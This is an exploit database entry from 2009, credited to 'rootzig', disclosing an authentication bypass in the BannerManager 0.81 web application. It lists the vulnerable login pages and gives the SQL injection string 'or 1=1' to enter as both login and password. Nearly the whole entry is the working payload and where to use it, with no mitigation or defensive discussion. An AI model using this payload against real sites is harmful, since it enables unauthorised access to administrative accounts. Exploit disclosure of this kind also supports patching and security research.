BannerManager 0.81 (Auth Bypass) SQL Injection Vulnerability

2009-02-26T00:00:00
ID 1337DAY-ID-4892
Type zdt
Reporter rootzig
Modified 2009-02-26T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ============================================================
BannerManager 0.81 (Auth Bypass) SQL Injection Vulnerability
============================================================


#################################################
#                                               #
# SISTEMA DE BANNER: BannerManager v0.81        #
# http://sourceforge.net/projects/bannermanager #
# --------------------------------------        # 
# vulnerable: sql injection :)                  #     
# Found by: rootzig                             #
# --------------------------------------        #
#################################################
                      Greetz: Eviwrite :P
                      -------------------
-----------------------------------------

/Banner/default.asp
/[patch]/default.asp

-----------------------------------------

Login: or 1=1 
Pass : or 1=1
        
-----------------------------------------



#  0day.today [2018-02-15]  #